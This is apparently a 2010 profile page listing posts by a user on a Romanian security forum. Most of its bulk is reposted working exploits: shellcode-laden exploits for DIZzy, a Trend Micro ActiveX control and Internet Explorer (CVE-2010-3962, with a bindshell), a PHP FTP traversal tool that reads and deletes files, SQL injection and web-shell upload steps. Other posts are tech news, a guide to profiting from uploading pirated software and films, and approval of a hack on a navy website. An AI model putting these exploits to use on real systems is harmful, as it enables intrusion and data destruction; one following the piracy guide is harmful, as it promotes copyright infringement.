-
Posts
1577 -
Joined
-
Last visited
-
Days Won
10
Everything posted by Gonzalez
-
#!/usr/bin/ruby # Exploit Title: DIZzy 1.12 Local Stack Overflow # Google Dork: n/a # Date: 17/11/2010 # Author: g30rg3_x # Version: 1.12 # Tested on: Windows XP SP3 Eng/Spa # CVE: n/a # Notes: Bug was originally found on 22/02/2010 but since there is no response from # developers it goes public. # win32/xp sp2 cmd.exe 57 bytes - Mountassif Moad aka Stack # http://www.exploit-db.com/exploits/13511/ shellcode = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC" + "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45" + "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45" + "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45" + "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3" # Preparing the exploit... nop_slide = "\x90" * 284 nop_slide2 = "\x90" * 17 jmp_esp = "\x73\x18\x6E\x74" # win32/xp sp3 MSCTF.dll: JMP ESP exploit = nop_slide + jmp_esp + nop_slide2 + shellcode executable = 'dizzy.exe' # Boom! exec(executable, exploit) -Gonzalez
-
Microsoft has just released their latest platform preview of Internet Explorer 9. The 7th release of the IE9 platform preview brings a number of performance improvements in Charka, Microsoft's JavaScript engine. The initial platform preview was released just 8 months ago, and already is impressing the tech community. The latest platform preview beats out all of the competition in the WebKit SunSpider JavaScript benchmark tests, and is even faster than Google Chrome. The first IE9 beta was released three months ago. Internet Explorer 9's preview platform is already leading the pack in HTML5 conformance tests, showing early signs Microsoft is doing something right with their latest browser. The IE9 team has increased its performance by 345% since the first platform preview. The video posted by Microsoft also shows off how well IE9 Platform Preview 7 can handle HTML5 compared to Firefox 4 beta 7 and Chrome 8 beta. The new platform preview brings three three new benchmark tests, including Galactic, HTML5 Sudoku, and Shakespeare's Tag Cloud. Microsoft also announced that since the launch of Internet Explorer 9 beta, it has seen over 13 million downloads. You can download IE9 Platform Preview 7 from testdrive.com. Preview: http://www.youtube.com/watch?v=VZXjxl5p_0c&feature=player_embedded
-
Vulnerability ID: HTB22697 Reference: http://www.htbridge.ch/advisory/sql_injection_in_compactcms.html Product: CompactCMS Vendor: compactcms.nl ( http://www.compactcms.nl/ ) Vulnerable Version: 1.4.1 Vendor Notification: 02 November 2010 Vulnerability Type: SQL Injection Status: Fixed by Vendor Risk level: High Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: The vulnerability exists due to failure in the "News" module to properly sanitize user-supplied input in "id" variable. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database. Attacker can use browser to exploit this vulnerability. The following PoC is available: http://compactcms/news.html?id=123%20union%20select%201,1,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23 Solution: Upgrade to the most recent version -Gonzalez
-
============================================================= Sitefinity CMS (ASP.NET) Shell Upload Vulnerability ============================================================= ################################################### # # Exploit Title: Sitefinity CMS (ASP.NET) Shell Upload Vulnerability # DDate: 16/11/2010 # Author: Net.Edit0r # Software Link: www.sitefinity.com # Version: 3.x . 4.0 # Tested on: windows SP2 Francais V.(Pnx2 2.0) # dork : "Sitefinity: Login" # Contact: Net.Edit0r@att.net ~ Black.hat.tm@gmail.com # #################################################### exploit # /UserControls/Dialogs/ImageEditorDialog.aspx first go to # http://site.com/sitefinity/ then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx select # asp renamed via the .asp;.jpg (shell.asp;.jpg) Upload to # http://site.com/Images/[shell] Video : http://net-edit0r.persiangig.com/Film/0day.rar ####################################################### Home : datacoders.org ~ ajaxtm.com #Iranian HackerZ >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d ,Raiden , m4hd1 ,P0W3RFU7 BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker
-
#################################################################### ##### <!-- Title: Trend Micro Internet Security Pro 2010 ActiveX Unicode Remote Exploit Version: UfPBCtrl.DLL ver 17.50.0.1366 (XPSP3 English) Version: UfPBCtrl.dll ver 17.50.0.1647 (XPSP3 English) -- Hotfix release Coded By: Dr_IDE Credits: Abyssec Tested: XPSP3 English + IE7 Link: www.trendmicro.com Notes: I only researched/posted this because the original did not work for me. Perhaps it's a windows language thing? Notes: If you want to try this locally you need to disable the "Protection Against Viruses & Spyware" option. --> <object ID='target' classid='clsid:15DBC3F9-9F0A-472E-8061- 043D9CEC52F0'></object> <script> //payload is windows/exec cmd=calc.exe shellcode = unescape( '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+ '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+ '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+ '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+ '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+ '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'); nops=unescape('%u9090%u9090'); headersize =20; slackspace= headersize + shellcode.length; while(nops.length < slackspace) nops+= nops; fillblock= nops.substring(0, slackspace); block= nops.substring(0, nops.length- slackspace); while( block.length+ slackspace<0x50000) block= block+ block+ fillblock; memory=new Array(); for( counter=0; counter<200; counter++) memory[counter]= block + shellcode; target.extSetOwner(unescape('%u50A1%u00C7')); //IEFRAME.DLL [0x00c750a6] = 0a0a0a0a (perfect?), we send just behind it </script> <!--[pocoftheday.blogspot.com]--> -Gonzalez
-
Leaked information about Windows 8 has been fairly sparse over the last few months, but some interesting PowerPoint slides reveal plans for the successor to Windows 7, codenamed Windows 8. Tech blogger Mary Jo Foley discovered these slideshow images via Ma-Config.com. It appears that Microsoft is looking to take Windows from a desktop application and expand it to “Desktop as a service” (DaaS). The slides reveal “Windows Next”, an internal saying for Microsoft employees who are referring to the next major operating system, and turning it into virtual / cloud based desktop. It only makes sense that Microsoft includes Windows with other virtualization technologies like Virtual desktop (VDI), application virtualization (App-V, MED-V, remote apps and more), Remote desktop, data virtualization, hardware virtualization (Hyper-V), plus a number of other available virtual services. Desktop as a Service isn’t an entirely new thing, but focusing an entire operating system on it is. With DaaS, Windows 8 could be easily deployed throughout an entire company with total hardware and application compatibility. This also opens the possibility of opening a Windows App Store in the next major version, where companies would host and run applications on ‘the cloud’, allowing for quicker security patch updates, greater compatibility and faster deployment through an entire infrastructure. It will be interesting to see what “Windows Next” brings to both businesses and consumers with OS virtualization. Deploying and maintaining a single service would be cost effective for larger businesses, just the push Microsoft might be looking for to help companies finally make the switch from Windows XP and Vista.
-
A 17-year-old from Queens claims to have done what Apple can't - and made $130,000 along the way. While the black iPhone 4 was released to US customers in June and the rest of the world in the months that followed, the phone's white model won't be in the hands of customers until Spring 2011 after a series of delays. Not content to wait that long, high school senior Fei Lam cut out the middleman and went straight to Apple parts supplier Foxconn, according to The New York Observer. The result was whiteiphone4now.com, a conversion kit that claims to allow customers to convert a black iPhone 4 to a white model. The site launched in July and at the time, it was unclear if the kits were, as TechCrunch observed, ''simply a bunch of parts from the black iPhone painted white''. Now, Lam has spoken out for the first time to confirm the authenticity of his products. "I knew a guy from a few years back that had somewhat of a relationship with folks in Foxconn," he told The Observer by email. He claimed that after initially selling the parts at a loss, attention from tech websites had allowed him to make US$130,000 in profit since August. Lam is currently selling the full conversion kit, which includes back and front panels, a retina display, supporting frame, front glass, digitizer, home button, back glass and LED diffuser and all necessary tools for US$279 plus shipping. As many would expect, Lam has claimed his business venture has attracted unwanted attention from those unhappy with his actions. ''I got an email from a private investigator accusing me of selling stolen goods, which I'm 100 percent sure is not the case. They are some kind of anti-counterfeit/trademark firm, which sounds ridiculous, similar to what Apple is bringing up to remove White iPhone 4 Listings on eBay. I don't know how this legal stuff works,'' he said. It remains to be seen if Apple will take legal action against the teen entrepreneur. Lam said he planned to contact a lawyer, but has no plans to stop selling the white iPhone parts.
-
How to add breadcrumbs to blogger blogs? 1. Sign in to your blogger dashboard 2. Navigate to "Edit Html" under the "Design" tab 3. Click on "Expand widget templates" so that you can insert the code snippets between widgetized area of your blogger template 4. Copy this code snippet:<b:include data='posts' name='breadcrumb'/> and paste it just below <b:include data='top' name='status-message'/>. 5. Now replace the code line <b:includable id='main' var='top'> with the code given below <b:includable id='breadcrumb' var='posts'> <b:if cond='data:blog.homepageUrl == data:blog.url'> <b:else/> <b:if cond='data:blog.pageType == "item"'> <p class='breadcrumbs'> <span class='post-labels'> <a expr:href='data:blog.homepageUrl' rel='tag'>Home</a> <b:loop values='data:posts' var='post'> <b:if cond='data:post.labels'> <b:loop values='data:post.labels' var='label'> <b:if cond='data:label.isLast == "true"'> » <a expr:href='data:label.url' rel='tag'><data:label.name/></a> </b:if> </b:loop> <b:else/> »Unlabelled </b:if> » <span><data:post.title/></span> </b:loop> </span> </p> <b:else/> <b:if cond='data:blog.pageType == "archive"'> <p class='breadcrumbs'> <span class='post-labels'> <a expr:href='data:blog.homepageUrl'>Home</a> » Archives for <data:blog.pageName/> </span> </p> <b:else/> <b:if cond='data:blog.pageType == "index"'> <p class='breadcrumbs'> <span class='post-labels'> <b:if cond='data:blog.pageName == ""'> <a expr:href='data:blog.homepageUrl'>Home</a> » All posts <b:else/> <a expr:href='data:blog.homepageUrl'>Home</a> » Posts filed under <data:blog.pageName/> </b:if> </span> </p> </b:if> </b:if> </b:if> </b:if> </b:includable> <b:includable id='main' var='top'> 6. Now its time for styling your breadcrumb navigation using css: .breadcrumbs { background:#fff;-moz-border-radius-topleft:2px;-moz-border-radius-topright:2px;-webkit-border-top-left-radius:2px;-webkit-border-top-right-radius:2px;-moz-border-radius-bottomleft:2px;-moz-border-radius-bottomright:2px;-webkit-border-bottom-left-radius:2px;-webkit-border-bottom-right-radius:2px; padding:5px 5px 5px 5px; margin: 0px 0px 0px 0px; font-size:95%; line-height: 1em; } Paste this css code just above the ]]></b:skin> tag.
-
Alright there are a lot of new uploaders and future uploaders out there who ask a million questions about uploading. How do I start? What do I upload? Where do I get uploads from? What file hosts should I use? Well i'm here to break it down for you! Section 1 First off you'll need to know the tools you'll need for uploading: 1: You need to have file host accounts. (4* and 5* sites for katz require you to have Rapidshare or Megaupload Links for every upload you make. Other sites and Katz porn do not require Rapidshare or Megaupload so you can use other places such as Hotfile and Fileserve.) Make sure you set up your paypal account in the filehosts so you can get pay out when you've accumulated enough money. 2: If your upload speeds on your computer aren't very fast you'll need to purchase Rapidleech or purchase your own VPS server and install phpuploader or just use the VPS to upload and download at very high speeds. (Rapidleech can be purchased from this guy hhttp://www.wjunction.com/member.php?u=2580 he has the best script for uploaders) 3: You need to find a good location to get uploads from, but you also need to make sure the location doesn't post fake uploads. Good sites to go to are, Releaselog | RLSLOG.net , OneDDL - One Stop Rapidshare Links and, SceneSource -Your source for Games, Movies, Music and more. 4: To really increase your earnings you should purchase a multi-poster which can be found here Extreme Coderz (With a multiposter you can spread your uploads to as many forums as you want for other users to download) Also here is a list of templates for MP4 WJunction Section 2 Now that you have the tools that you need to upload and the sites to get uploads from it's time to move on to being a great uploader! Good uploaders will post a lot of information about their uploads. This is good because the person wanting to download it will know exactly what they're getting. Good info to add to posts are Movie covers, release information, homepage links, and screen shots but more information is never unwanted like trailers, demo video's etc.. Another good tip is to always add the full upload name in your rar files so you and the downloader can see that it's the correct download. Here are some example posts: (Links below aren't meant for downloading just to show you a good solid post) Movie: http://www.warezxtreme.org/wx-movies...tml#post859449 Music: Middle Class Rut ? No Name No Color 2010-MTD - Rapidshare, hotfile & fileserve warez downloads TV: http://www.warezxtreme.org/wx-tv/818...ds-s06e07.html Game: NBA 2K11 (Xbox 360) – Katz Downloads Application: http://www.warezxtreme.org/wx-apps/8...-73-317-a.html Section 3 Now to break it down for you! 1. Find the upload you want to upload whether it be from torrents or the sites posted above 2. Download them to your PC, Rapidleech or VPS 3. Unrar the files then rar them back up if needed. (If you're uploading for a site add their site name in the rar name) 4. Upload the files to Rapidshare, Megaupload, Hotfile, Fileserve or any other host you want to use 5. Make your post on the site you're uploading for or posting on. (Poster/Cover, Information about the upload, Screenshots, then finally Download Links. 6. Run the multiposter program to spread your links all over the warez world. (Remember that you have to create accounts on the sites you're spreading to and set up the multiposter for each of those sites in order for the program to be able to post the uploads on the other sites) Tip of the day: "You have to spend money to make money" Tip of the year: "Sites to setup in Jay's Multiposter would be all 5* sites and most 4* sites"
-
<?php # _ ____ __ __ ___ # (_)____ _ __/ __ \/ /_____ ____/ / _/_/ | # / // __ \ | / / / / / //_/ _ \/ __ / / / / / # / // / / / |/ / /_/ / ,< / __/ /_/ / / / / / # /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/ # Live by the byte |_/_/ # # Members: # # Pr0T3cT10n # -=M.o.B.=- # TheLeader # Sro # # Contact: inv0ked.israel@gmail.com # # ----------------------------------- # The following is a proof of concept exploit for a path traversal vulnerability that exists in Home FTP Server. # The vulnerability allows an unprivileged attacker to read files and delete files & folders whom he has no permissions to. # The vulnerable FTP commands are: # * RETR - Read File # * DELE - Delete File # * RMD - Remove Directory #----------------------------------- # Exploit Title: Home FTP Server v1.11.1.149 Remote Directory Traversal Exploit # Date: 31/10/2010 # Author: Pr0T3cT10n # Software Link: http://downstairs.dnsalias.net/files/HomeFtpServerInstall.exe # Affected Version: 1.11.1.149 # Tested on Windows XP Hebrew, Service Pack 3 # ISRAEL, NULLBYTE.ORG.IL ### error_reporting(E_ALL); if(count($argv) <= 4) { echo("\r\n# Usage: {$argv[0]} [HOST] [PORT] [USER] [PASS]\r\n"); echo("\tHOST - An host using Home FTP Server\r\n"); echo("\tPORT - Default is 21\r\n"); echo("\tUSER - Username\r\n"); echo("\tPASS - Password\r\n"); exit("\r\n"); } else { $CMD = ''; $CFG = Array('file' => $argv[0], 'host' => $argv[1], 'port' => $argv[2], 'user' => $argv[3], 'pass' => $argv[4]); $sock = fsockopen($CFG['host'], $CFG['port'], $errno, $errstr, 5); if($sock) { echo("(+) Connected to the FTP server at '{$CFG['host']}' on port {$CFG['port']}\r\n"); $read = fread($sock, 1024); fwrite($sock, "USER {$CFG['user']}\r\n"); $read = fread($sock, 1024); fwrite($sock, "PASS {$CFG['pass']}\r\n"); $read = fread($sock, 1024); echo("(~) What would you like to do?\r\n\t1.Remove File\r\n\t2.Remove Directory\r\n\t3.Read File\r\n"); $CHSE = rtrim(fgets(STDIN)); if($CHSE == 1) { $CMD.= "DELE"; echo("(~) Path to file(for example: ../../../test.txt): "); $PATH = rtrim(fgets(STDIN)); if($PATH != '') { fwrite($sock, "{$CMD} {$PATH}\r\n"); echo(fread($sock, 1024)); } else { exit("(-) Empty path.\r\n"); } } elseif($CHSE == 2) { $CMD.= "RMD"; echo("(~) Path to directory(for example: ../../../test): "); $PATH = rtrim(fgets(STDIN)); if($PATH != '') { fwrite($sock, "{$CMD} {$PATH}\r\n"); echo(fread($sock, 1024)); } else { exit("(-) Empty path.\r\n"); } } elseif($CHSE == 3) { $CMD.= "RETR"; echo("(~) Path to file(for example: ../../../test.txt): "); $PATH = rtrim(fgets(STDIN)); if($PATH != '') { fwrite($sock, "PASV\r\n"); $read = fread($sock, 1024); $xpld = explode(',', $read); $addr_tmp = explode('(', $xpld[0]); $address = "{$addr_tmp[1]}.{$xpld[1]}.{$xpld[2]}.{$xpld[3]}"; $port_tmp = explode(')', $xpld[5]); $newport = ($xpld[4]*256)+$port_tmp[0]; fwrite($sock, "{$CMD} {$PATH}\r\n"); $read = fread($sock, 1024); $socket = fsockopen($address, $newport, $errno, $errstr, 5); if($socket) { echo(fread($socket, 1024)); } } else { exit("(-) Empty path.\r\n"); } } else { exit("(-) You have to choose correctly.\r\n"); } } else { exit("(-) Unable to connect to {$CFG['host']}:{$CFG['port']}\r\n"); } } ?> -Gonzalez
-
# Exploit title: FileCOPA FTP Server 6.01 directory traversal # Date: 07.11.2010 # Software Link: http://www.filecopa-ftpserver.com/ # Version: 6.01 # Tested on: Windows XP SP3 Professional # Author: Pawel h0wl Wylecial #.::Cyber-Crime Team::. # http://cc-team.org # http://h0wl.baywords.com Details: 220-InterVations FileCOPA FTP Server Version 6.01 2nd November 2010 220 Trial Version. 30 days remaining user anonymous 331 Password required for anonymous pass asd 230 User anonymous logged in. pasv 227 Entering Passive Mode (0,0,0,0,15,160) list ..\..\ 150 Opening ASCII mode data connection for file list 11-14-09 11:49PM 0 AUTOEXEC.BAT 11-14-09 11:43PM 211 boot.ini 04-15-08 01:00PM 4952 Bootfont.bin 11-07-10 04:45PM <DIR> Config.Msi 11-14-09 11:49PM 0 CONFIG.SYS 11-14-09 11:56PM <DIR> Documents and Settings 11-14-09 11:49PM 0 IO.SYS 11-14-09 11:49PM 0 MSDOS.SYS 04-15-08 01:00PM 47564 NTDETECT.COM 04-15-08 01:00PM 251152 ntldr 11-07-10 05:45PM 1610612736 pagefile.sys 11-07-10 04:47PM <DIR> Program Files 11-15-09 12:16AM <DIR> RECYCLER 11-14-09 11:53PM <DIR> System Volume Information 11-07-10 06:29PM <DIR> WINDOWS 226 Transfer complete. 220-InterVations FileCOPA FTP Server Version 6.01 2nd November 2010 220 Trial Version. 30 days remaining user anonymous 331 Password required for anonymous pass asd 230 User anonymous logged in. pasv 227 Entering Passive Mode (0,0,0,0,15,160) cwd ..\..\ 250 CWD command successful. retr boot.ini 150 Opening ASCII mode data connection for boot.ini (211 bytes) [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect 226 Transfer complete. -Gonzalez
-
# Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962 # Tested on Windows XP SP3 IE6 IE7 IE8 # Coded by Matteo Memelli ryujin __at__ offsec.com # http://www.offensive-security.com/0day/ie-0day.txt # Thx to dookie __at__ offsec.com # notes : This is a quick and dirty exploit! No DEP/ASLR bypass here feel free to improve it <!-- Tested on IE6/IE7/IE8 XPSP3 quick and dirty sploit for CVE-2010-3962 zeroday Note: The EIP value at crash time is not controllable and depends on the exact version of the mshtml library used by IE; this means that the exploit is not universal for the IE versions indicated hereunder. A huge spray will probably be more successful on different versions of mshtml but will definetly slow down the exploitation. IE6 on XP SP2: mshtml.dll Version 6.0.2900.5512 EIP: 0x0D7DC9C9 IE6 on XP SP3: mshtml.dll Version 6.00.2900.6036 Patched 06Nov10 EIP: 0x0E7DC9CD IE7 on XP SP3: mshtml.dll Version 7.00.6000.17080 EIP: 0x303CEEBB IE8 on XP SP3: mshtml.dll Version 8.00.6001.18939 EIP: 0x1D3CF5BD IE8 on XP SP3 Patched 06Nov10: mshtml.dll Version 8.00.6001.18975 EIP: 0x4D3CF5BF Matteo Memelli, ryujin __at__ offsec.com thx to dookie __at__ offsec.com //--> <html> <head><title>poc CVE-2010-3962 zeroday</title> <script> function alloc(bytes, mystr) { // Bindshell on port 4444 var shellcode = unescape('%u9090%u9090%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b'+ '%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b'+ '%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34'+ '%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301'+ '%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a'+ '%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4'+ '%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7%u53db%u0268'+ '%u1100%u895c%u6ae6%u5610%u6857%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff%u53d5%u5753%u7468'+ '%u3bec%uffe1%u57d5%uc789%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389%u5757%u3157%u6af6%u5912'+ '%ue256%u66fd%u44c7%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650%u5656%u5646%u564e%u5356%u6856'+ '%ucc79%u863f%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd'+ '%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u41d5'); while (mystr.length< bytes) mystr += mystr; return mystr.substr(0, (bytes-6)/2) + shellcode; } </script> </head> <body> <script> alert('ph33r: click me'); var evil = new Array(); var FAKEOBJ = unescape("%u0d0d%u0d0d"); //FAKEOBJ = alloc(233120, FAKEOBJ); // IE6 mshtml.dll Version 6.0.2900.5512 //FAKEOBJ = alloc(241748, FAKEOBJ); // IE6 mshtml.dll Version 6.00.2900.6036 //FAKEOBJ = alloc(733120, FAKEOBJ); // IE7 mshtml.dll Version 7.00.6000.17080 //FAKEOBJ = alloc(433120, FAKEOBJ); // IE8 mshtml.dll Version 8.00.6001.18939 FAKEOBJ = alloc(1294464, FAKEOBJ); // IE8 mshtml.dll Version 8.00.6001.18975 //FAKEOBJ = alloc(1550371, FAKEOBJ); // oy oy oy huge spray! for (var k = 0; k < 1000; k++) { evil[k] = FAKEOBJ.substr(0, FAKEOBJ.length); } document.write("<table style=position:absolute;clip:rect(0)>"); </script> </body> </html> -Gonzalez
-
The Seventh Seal - Groundation.mp3 -Gonzalez
-
Alborosie - Real Story.mp3 -Gonzalez
-
Cam ceva de genu caut: -Gonzalez
-
1.trebuie sa ai o varsta cuprinsa intre 18-40 ani.In caz ca esti minor trebuie autorizatie scrisa de unul din parinti sau tutore. 2.documente necesare;buletin,pasaport,permis de conducere sau declaratie de identitate. 3.sa fi sanatos sa ai o conditie fizica foarte buna,sa ai dantura in stare foarte buna[80% intreaga]. 4.nu este necesar sa sti limba franceza pentru ca o vei invata acolo[preferabil sa sti cuvinte de baza:drepti,culcat,dreapta,stanga etc.. 5.recrutarea se face doar pe teritoriul FRANTEI.Candidatul trebuie sa ajunga acolo prin resurse proprii. 5.contractul este pe o durata de 5 ani.Tot acest timp nu ai voie sa parasesti franta sau sa mergi in tara de origine. 6.angajarea in legiune se poate face in centrele de recrutare din franta in orice moment si ora. 7.ori cine se poate angaja indiferent de religie,natie sau culoare. 8.ajunsi la centrul de recrutare candidatul va fi supus unor teste medicale.Apoi recrutul va fi condus la REGIMENTUL DE COMANDAMENT al Legiuni unde vor urma teste amanuntite:medicale,profesionale,sportive,psicotehnice. 9.daca trece toate aceste teste recrutul va semna un contract neconditional pe o perioada de 5 ani cu legiunea. 10.apoi voluntarul va incepe instructia militara de baza care dureaza 14 saptamani. 11.dupa terminarea instructiei vei fi repartizat unui regiment in functie de performantele pe care leai avut la instructie si nevoile regimentelor. 12.daca ai avut un punctaj foarte bun la instructie si esti printre primi,ai sansa sa iti alegi tu regimentul la care vrei sa operezi Mai multe gasesti aici: http://malezu.wordpress.com/legiunea-straina-conditi-de-angajare/ -Gonzalez
-
Volkswagen, Porsche, Commerzbank...Marile companii blocheaz? accesul angaja?ilor la re?elele sociale Twitter ?i Facebook, potrivit s?pt?mânalului german Wirtschaftswoche, citat de capital.fr. Mai mult, gigantul energetic E.On ?i grupul gazier Linde inten?ioneaz? s? interzic? accesul ?i la YouTube. Principalul motiv: teama de spionajul industrial. O team? justificat?, dac? ar fi s? d?m crezare unui furnizor de echipamente antivirus, care a declarat, pentru publica?ia german? c? “re?elele sociale (Facebook, Twitter, etc.) sunt principala poart? de intrare a viru?ilor în sistemele informatice ale companiilor”. Directorii mai au un motiv de team?: productivitatea angaja?ilor. Mai mult de o treime din angaja?ii din Germania au recunoscut c? folosesc, la locul de munc?, re?elele sociale în interes personal. Facebook ?i Twitter au intrat ?i în vizorul guvernului condus de Angela Merkel, care inten?ioneaz? s? promoveze o lege prin care firmele de resurse umane nu mai au voie s? utilizeze re?elele sociale pentru recrut?ri, cu scopul de a se proteja via?a privat? a candida?ilor la joburi. Vor fi permise doar platformele profesionale, ca Xing sau LinkedIn. Sursa: Money.ro -Gonzalez
-
Stie careva o companie de web hosting pentru warez(app,movies,games,porn etc)? Site-ul de web hosting sa fie bun si de incredere daca se poate, in afara de Powerhost.ro. -Gonzalez
-
Gigan?ii internetului de la Yahoo vor o felie din pia?a româneasc? online. Acest lucur se întâmpl? pentru c? pia?a româneasc? are o cre?tere spectaculoas?. Astfel, de anul viitor vom avea o pagin? de "yahoo punct ro". Potrivit Antena 3, 90% dintre românii care utilizeaz? zilnic internetul acceseaz? pagina Yahoo. Recordul a fost înregistrat în ianuarie când 8 milioane de români au accesat siteul. Pentru mai marii companiei, cifrele au fost suficiente ca s? se decid? c? este nevoie de o pagin? "yahoo punct ro". Alte ??ri care acceseaz? Yahoo în limba materna sunt Fran?a, Canada ?i Spania, care au primit deja termina?ii personalizate pentru ?ara lor. Yahoo.ro va însemna ?i ?tiri în limba român?. O echip? întreag? va lucra la con?inut, la fel ca în Statele Unite. Acolo, echipa de editori a siteului func?ioneaz? ca o adev?rat? redac?ie de ?tiri. Asta înseamn? o oportunitate ?i pentru publicitari. Mai exact, o cre?tere a vânz?rilor de reclam? on line. În 2009 pia?a româneasc? de publicitate online era de 16 milioane de euro. Românii vor putea accesa "yahoo.ro" din 2011 Sursa: Antena3
-
Freddie Gibbs - Serve or Get Served.mp3 -Gonzalez
-
Site-ul Forţelor navale regale britanice, atacat de un hacker român
Gonzalez replied to yceman's topic in Stiri securitate
Bine o facut. -Gonzalez -
4 mil ajung in buzunarul parlamentarilor. Tara de cacat cu oameni si mai de cacat si prosti pe deasupra. -Gonzalez